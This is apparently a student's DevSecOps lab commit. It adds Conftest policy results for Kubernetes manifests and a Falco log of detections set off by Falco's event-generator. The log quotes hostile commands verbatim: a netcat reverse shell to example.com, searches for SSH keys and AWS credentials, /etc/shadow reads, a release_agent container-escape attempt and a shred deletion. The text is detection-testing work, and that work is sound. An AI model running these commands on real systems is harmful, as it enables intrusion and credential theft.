diff --git a/labs/lab9/analysis/conftest-compose.txt b/labs/lab9/analysis/conftest-compose.txt new file mode 100644 index 00000000..ca9d30b8 --- /dev/null +++ b/labs/lab9/analysis/conftest-compose.txt @@ -0,0 +1,2 @@ + +15 tests, 15 passed, 0 warnings, 0 failures, 0 exceptions diff --git a/labs/lab9/analysis/conftest-hardened.txt b/labs/lab9/analysis/conftest-hardened.txt new file mode 100644 index 00000000..9da25fba --- /dev/null +++ b/labs/lab9/analysis/conftest-hardened.txt @@ -0,0 +1,2 @@ + +30 tests, 30 passed, 0 warnings, 0 failures, 0 exceptions diff --git a/labs/lab9/analysis/conftest-unhardened.txt b/labs/lab9/analysis/conftest-unhardened.txt new file mode 100644 index 00000000..ff1049f3 --- /dev/null +++ b/labs/lab9/analysis/conftest-unhardened.txt @@ -0,0 +1,12 @@ +WARN - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" should define livenessProbe +WARN - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" should define readinessProbe +FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.limits.cpu +FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.limits.memory +FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.requests.cpu +FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.requests.memory +FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" must set allowPrivilegeEscalation: false +FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" must set readOnlyRootFilesystem: true +FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" must set runAsNonRoot: true +FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" uses disallowed :latest tag + +30 tests, 20 passed, 2 warnings, 8 failures, 0 exceptions diff --git a/labs/lab9/falco/logs/falco.log b/labs/lab9/falco/logs/falco.log new file mode 100644 index 00000000..0a1ef718 --- /dev/null +++ b/labs/lab9/falco/logs/falco.log @@ -0,0 +1,31 @@ +{"hostname":"5238b209792c","output":"2025-11-07T18:16:23.209907608+0000: Notice A shell was spawned in a container with an attached terminal | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=containerd-shim command=sh -lc echo hello-from-shell terminal=34816 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=c1209dd4c6e6 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c1209dd4c6e6","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1762539383209907608,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -lc echo hello-from-shell","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pname":"containerd-shim","proc.tty":34816,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Terminal shell in container","source":"syscall","tags":["T1059","container","maturity_stable","mitre_execution","shell"],"time":"2025-11-07T18:16:23.209907608Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:16:34.172443196+0000: Warning Falco Custom: File write in /usr/local/bin (container= user=root file=/usr/local/bin/drift.txt flags=O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER) container_id=c1209dd4c6e6 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c1209dd4c6e6","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.flags":"O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER","evt.time.iso8601":1762539394172443196,"fd.name":"/usr/local/bin/drift.txt","k8s.ns.name":null,"k8s.pod.name":null,"user.name":"root"},"priority":"Warning","rule":"Write Binary Under UsrLocalBin","source":"syscall","tags":["compliance","container","drift"],"time":"2025-11-07T18:16:34.172443196Z"} +Events detected: 2 +Rule counts by severity: + WARNING: 1 + NOTICE: 1 +Triggered rules by rule name: + Terminal shell in container: 1 + Write Binary Under UsrLocalBin: 1 +{"hostname":"5238b209792c","output":"2025-11-07T18:16:50.778228010+0000: Warning Falco Custom: File write in /usr/local/bin (container= user=root file=/usr/local/bin/custom-rule.txt flags=O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER) container_id=c1209dd4c6e6 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c1209dd4c6e6","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.flags":"O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER","evt.time.iso8601":1762539410778228010,"fd.name":"/usr/local/bin/custom-rule.txt","k8s.ns.name":null,"k8s.pod.name":null,"user.name":"root"},"priority":"Warning","rule":"Write Binary Under UsrLocalBin","source":"syscall","tags":["compliance","container","drift"],"time":"2025-11-07T18:16:50.778228010Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:16:59.228352305+0000: Informational System user ran an interactive command | evt_type=execve user=daemon user_uid=2 user_loginuid=-1 process=login proc_exepath=/bin/busybox parent=event-generator command=login terminal=0 exe_flags=EXE_LOWER_LAYER container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.flags":"EXE_LOWER_LAYER","evt.time.iso8601":1762539419228352305,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"login","proc.exepath":"/bin/busybox","proc.name":"login","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"daemon","user.uid":2},"priority":"Informational","rule":"System user interactive","source":"syscall","tags":["NIST_800-53_AC-2","T1059","container","host","maturity_stable","mitre_execution","users"],"time":"2025-11-07T18:16:59.228352305Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:16:59.336567222+0000: Warning Grep private keys or passwords activities found | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=find proc_exepath=/bin/busybox parent=event-generator command=find /tmp -maxdepth 1 -iname id_rsa terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1762539419336567222,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"find /tmp -maxdepth 1 -iname id_rsa","proc.exepath":"/bin/busybox","proc.name":"find","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Search Private Keys or Passwords","source":"syscall","tags":["T1552.001","container","filesystem","host","maturity_stable","mitre_credential_access","process"],"time":"2025-11-07T18:16:59.336567222Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:05.604066767+0000: Warning Sensitive file opened for reading by trusted program after startup | file=/etc/shadow pcmdline=event-generator run syscall gparent=containerd-shim ggparent=init gggparent= evt_type=openat user=root user_uid=0 user_loginuid=-1 process=httpd proc_exepath=/bin/event-generator parent=event-generator command=httpd --loglevel info run ^syscall.ReadSensitiveFileUntrusted$ --sleep 6s terminal=0 container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.time.iso8601":1762539425604066767,"evt.type":"openat","fd.name":"/etc/shadow","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"containerd-shim","proc.aname[3]":"init","proc.aname[4]":null,"proc.cmdline":"httpd --loglevel info run ^syscall.ReadSensitiveFileUntrusted$ --sleep 6s","proc.exepath":"/bin/event-generator","proc.name":"httpd","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Read sensitive file trusted after startup","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2025-11-07T18:17:05.604066767Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:05.913951600+0000: Critical Fileless execution via memfd_create | container_start_ts=1762539418844244304 proc_cwd=/ evt_res=SUCCESS proc_sname=event-generator gparent=containerd-shim evt_type=execve user=root user_uid=0 user_loginuid=-1 process=3 proc_exepath=memfd:program parent=event-generator command=3 run helper.DoNothing terminal=0 exe_flags=EXE_WRITABLE|EXE_FROM_MEMFD container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"container.start_ts":1762539418844244304,"evt.arg.flags":"EXE_WRITABLE|EXE_FROM_MEMFD","evt.res":"SUCCESS","evt.time.iso8601":1762539425913951600,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"containerd-shim","proc.cmdline":"3 run helper.DoNothing","proc.cwd":"/","proc.exepath":"memfd:program","proc.name":"3","proc.pname":"event-generator","proc.sname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Critical","rule":"Fileless execution via memfd_create","source":"syscall","tags":["T1620","container","host","maturity_stable","mitre_defense_evasion","process"],"time":"2025-11-07T18:17:05.913951600Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:06.271531892+0000: Warning Symlinks created over sensitive files | target=/etc linkpath=/tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-2606254030/etc_link evt_type=symlinkat user=root user_uid=0 user_loginuid=-1 process=ln proc_exepath=/bin/busybox parent=event-generator command=ln -s /etc /tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-2606254030/etc_link terminal=0 container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.linkpath":"/tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-2606254030/etc_link","evt.arg.target":"/etc","evt.time.iso8601":1762539426271531892,"evt.type":"symlinkat","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"ln -s /etc /tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-2606254030/etc_link","proc.exepath":"/bin/busybox","proc.name":"ln","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Create Symlink Over Sensitive Files","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2025-11-07T18:17:06.271531892Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:06.374162559+0000: Warning Log files were tampered | file=/tmp/falco-event-generator-syscall-ClearLogActivities-1105780433/syslog evt_type=openat user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.time.iso8601":1762539426374162559,"evt.type":"openat","fd.name":"/tmp/falco-event-generator-syscall-ClearLogActivities-1105780433/syslog","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Clear Log Activities","source":"syscall","tags":["NIST_800-53_AU-10","T1070","container","filesystem","host","maturity_stable","mitre_defense_evasion"],"time":"2025-11-07T18:17:06.374162559Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:06.477013309+0000: Notice Detected potential PTRACE_TRACEME anti-debug attempt | proc_pcmdline=event-generator run syscall evt_type=ptrace user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=event-generator command=event-generator run syscall terminal=0 container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.time.iso8601":1762539426477013309,"evt.type":"ptrace","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"PTRACE anti-debug attempt","source":"syscall","tags":["T1622","container","host","maturity_stable","mitre_defense_evasion","process"],"time":"2025-11-07T18:17:06.477013309Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:06.579708225+0000: Warning Read monitored file via directory traversal | file=/etc/shadow fileraw=/etc/../etc/../etc/shadow gparent=init ggparent= gggparent= evt_type=openat user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.time.iso8601":1762539426579708225,"evt.type":"openat","fd.name":"/etc/shadow","fd.nameraw":"/etc/../etc/../etc/shadow","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"init","proc.aname[3]":null,"proc.aname[4]":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Directory traversal monitored file read","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2025-11-07T18:17:06.579708225Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:06.681019767+0000: Warning Sensitive file opened for reading by non-trusted program | file=/etc/shadow gparent=init ggparent= gggparent= evt_type=openat user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.time.iso8601":1762539426681019767,"evt.type":"openat","fd.name":"/etc/shadow","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"init","proc.aname[3]":null,"proc.aname[4]":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Read sensitive file untrusted","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2025-11-07T18:17:06.681019767Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:06.790433725+0000: Warning Hardlinks created over sensitive files | target=/etc/shadow linkpath=/tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-430131139/shadow_link evt_type=linkat user=root user_uid=0 user_loginuid=-1 process=ln proc_exepath=/bin/busybox parent=event-generator command=ln -v /etc/shadow /tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-430131139/shadow_link terminal=0 container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.newpath":"/tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-430131139/shadow_link","evt.arg.oldpath":"/etc/shadow","evt.time.iso8601":1762539426790433725,"evt.type":"linkat","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"ln -v /etc/shadow /tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-430131139/shadow_link","proc.exepath":"/bin/busybox","proc.name":"ln","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Create Hardlink Over Sensitive Files","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2025-11-07T18:17:06.790433725Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:06.896301392+0000: Warning Detected ptrace PTRACE_ATTACH attempt | proc_pcmdline=containerd-shim -namespace moby -id f66ca412350581408284a7736ffedb48569c506eb586f8a997497b17244c4674 -address /run/containerd/containerd.sock evt_type=ptrace user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.time.iso8601":1762539426896301392,"evt.type":"ptrace","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pcmdline":"containerd-shim -namespace moby -id f66ca412350581408284a7736ffedb48569c506eb586f8a997497b17244c4674 -address /run/containerd/containerd.sock","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"PTRACE attached to process","source":"syscall","tags":["T1055.008","container","host","maturity_stable","mitre_privilege_escalation","process"],"time":"2025-11-07T18:17:06.896301392Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:06.999811184+0000: Warning Bulk data has been removed from disk | file= evt_type=execve user=root user_uid=0 user_loginuid=-1 process=shred proc_exepath=/bin/busybox parent=event-generator command=shred -u /tmp/falco-event-generator-syscall-RemoveBulkDataFromDisk-2780101379 terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1762539426999811184,"evt.type":"execve","fd.name":null,"k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"shred -u /tmp/falco-event-generator-syscall-RemoveBulkDataFromDisk-2780101379","proc.exepath":"/bin/busybox","proc.name":"shred","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Remove Bulk Data from Disk","source":"syscall","tags":["T1485","container","filesystem","host","maturity_stable","mitre_impact","process"],"time":"2025-11-07T18:17:06.999811184Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:07.110651809+0000: Critical Detect an attempt to exploit a container escape using release_agent file | file=/release_agent cap_effective=CAP_CHOWN CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_FOWNER CAP_FSETID CAP_KILL CAP_SETGID CAP_SETUID CAP_SETPCAP CAP_LINUX_IMMUTABLE CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_ADMIN CAP_NET_RAW CAP_IPC_LOCK CAP_IPC_OWNER CAP_SYS_MODULE CAP_SYS_RAWIO CAP_SYS_CHROOT CAP_SYS_PTRACE CAP_SYS_PACCT CAP_SYS_ADMIN CAP_SYS_BOOT CAP_SYS_NICE CAP_SYS_RESOURCE CAP_SYS_TIME CAP_SYS_TTY_CONFIG CAP_MKNOD CAP_LEASE CAP_AUDIT_WRITE CAP_AUDIT_CONTROL CAP_SETFCAP CAP_MAC_OVERRIDE CAP_MAC_ADMIN CAP_SYSLOG CAP_WAKE_ALARM CAP_BLOCK_SUSPEND CAP_AUDIT_READ CAP_PERFMON CAP_BPF CAP_CHECKPOINT_RESTORE evt_type=openat user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=event-generator command=sh -c echo 'hello world' > release_agent terminal=0 container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.time.iso8601":1762539427110651809,"evt.type":"openat","fd.name":"/release_agent","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -c echo 'hello world' > release_agent","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pname":"event-generator","proc.tty":0,"thread.cap_effective":"CAP_CHOWN CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_FOWNER CAP_FSETID CAP_KILL CAP_SETGID CAP_SETUID CAP_SETPCAP CAP_LINUX_IMMUTABLE CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_ADMIN CAP_NET_RAW CAP_IPC_LOCK CAP_IPC_OWNER CAP_SYS_MODULE CAP_SYS_RAWIO CAP_SYS_CHROOT CAP_SYS_PTRACE CAP_SYS_PACCT CAP_SYS_ADMIN CAP_SYS_BOOT CAP_SYS_NICE CAP_SYS_RESOURCE CAP_SYS_TIME CAP_SYS_TTY_CONFIG CAP_MKNOD CAP_LEASE CAP_AUDIT_WRITE CAP_AUDIT_CONTROL CAP_SETFCAP CAP_MAC_OVERRIDE CAP_MAC_ADMIN CAP_SYSLOG CAP_WAKE_ALARM CAP_BLOCK_SUSPEND CAP_AUDIT_READ CAP_PERFMON CAP_BPF CAP_CHECKPOINT_RESTORE","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Critical","rule":"Detect release_agent File Container Escapes","source":"syscall","tags":["T1611","container","maturity_stable","mitre_privilege_escalation","process"],"time":"2025-11-07T18:17:07.110651809Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:07.218671851+0000: Critical Executing binary not part of base image | proc_exe=/bin/falco-event-generator-syscall-DropAndExecuteNewBinaryInContainer-urWKNW proc_sname=event-generator gparent=containerd-shim proc_exe_ino_ctime=1762539427214632004 proc_exe_ino_mtime=1762539427214632004 proc_exe_ino_ctime_duration_proc_start=3662263 proc_cwd=/ container_start_ts=1762539418844244304 evt_type=execve user=root user_uid=0 user_loginuid=-1 process=falco-event-gen proc_exepath=/bin/falco-event-generator-syscall-DropAndExecuteNewBinaryInContainer-urWKNW parent=event-generator command=falco-event-gen terminal=0 exe_flags=EXE_WRITABLE|EXE_UPPER_LAYER container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"container.start_ts":1762539418844244304,"evt.arg.flags":"EXE_WRITABLE|EXE_UPPER_LAYER","evt.time.iso8601":1762539427218671851,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"containerd-shim","proc.cmdline":"falco-event-gen","proc.cwd":"/","proc.exe":"/bin/falco-event-generator-syscall-DropAndExecuteNewBinaryInContainer-urWKNW","proc.exe_ino.ctime":1762539427214632004,"proc.exe_ino.ctime_duration_proc_start":3662263,"proc.exe_ino.mtime":1762539427214632004,"proc.exepath":"/bin/falco-event-generator-syscall-DropAndExecuteNewBinaryInContainer-urWKNW","proc.name":"falco-event-gen","proc.pname":"event-generator","proc.sname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Critical","rule":"Drop and execute new binary in container","source":"syscall","tags":["PCI_DSS_11.5.1","TA0003","container","maturity_stable","mitre_persistence","process"],"time":"2025-11-07T18:17:07.218671851Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:07.323949559+0000: Warning Netcat runs inside container that allows remote code execution | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=nc proc_exepath=/usr/bin/nc parent=event-generator command=nc -e /bin/sh example.com 22 terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1762539427323949559,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"nc -e /bin/sh example.com 22","proc.exepath":"/usr/bin/nc","proc.name":"nc","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Netcat Remote Code Execution in Container","source":"syscall","tags":["T1059","container","maturity_stable","mitre_execution","network","process"],"time":"2025-11-07T18:17:07.323949559Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:07.763578018+0000: Notice Disallowed SSH Connection | connection=172.17.0.4:33294->23.215.0.138:443 lport=443 rport=33294 fd_type=ipv4 fd_proto=tcp evt_type=connect user=root user_uid=0 user_loginuid=-1 process=ssh proc_exepath=/usr/bin/ssh parent=event-generator command=ssh user@example.com -p 443 terminal=0 container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.time.iso8601":1762539427763578018,"evt.type":"connect","fd.l4proto":"tcp","fd.lport":443,"fd.name":"172.17.0.4:33294->23.215.0.138:443","fd.rport":33294,"fd.type":"ipv4","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"ssh user@example.com -p 443","proc.exepath":"/usr/bin/ssh","proc.name":"ssh","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Disallowed SSH Connection Non Standard Port","source":"syscall","tags":["T1059","container","host","maturity_stable","mitre_execution","network","process"],"time":"2025-11-07T18:17:07.763578018Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:08.036413309+0000: Warning Detected AWS credentials search activity | proc_pcmdline=event-generator run syscall proc_cwd=/ group_gid=0 group_name=root user_loginname= evt_type=execve user=root user_uid=0 user_loginuid=-1 process=find proc_exepath=/bin/busybox parent=event-generator command=find /tmp -maxdepth 1 -iname .aws/credentials terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1762539428036413309,"evt.type":"execve","group.gid":0,"group.name":"root","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"find /tmp -maxdepth 1 -iname .aws/credentials","proc.cwd":"/","proc.exepath":"/bin/busybox","proc.name":"find","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginname":"","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Find AWS Credentials","source":"syscall","tags":["T1552","aws","container","host","maturity_stable","mitre_credential_access","process"],"time":"2025-11-07T18:17:08.036413309Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:08.271321893+0000: Notice Shell spawned by untrusted binary | parent_exe=/tmp/falco-event-generator-syscall-spawned-123866185/httpd parent_exepath=/bin/event-generator pcmdline=httpd --loglevel info run ^helper.RunShell$ gparent=event-generator ggparent=containerd-shim aname[4]=init aname[5]= aname[6]= aname[7]= evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=httpd command=sh -c ls > /dev/null terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1762539428271321893,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"event-generator","proc.aname[3]":"containerd-shim","proc.aname[4]":"init","proc.aname[5]":null,"proc.aname[6]":null,"proc.aname[7]":null,"proc.cmdline":"sh -c ls > /dev/null","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pcmdline":"httpd --loglevel info run ^helper.RunShell$","proc.pexe":"/tmp/falco-event-generator-syscall-spawned-123866185/httpd","proc.pexepath":"/bin/event-generator","proc.pname":"httpd","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Run shell untrusted","source":"syscall","tags":["T1059.004","container","host","maturity_stable","mitre_execution","process","shell"],"time":"2025-11-07T18:17:08.271321893Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:08.378788643+0000: Notice Packet socket was created in a container | socket_info=fd=6() domain=17(AF_PACKET) type=3 proto=3 connection= lport= rport= fd_type= fd_proto= evt_type=socket user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.args":"fd=6() domain=17(AF_PACKET) type=3 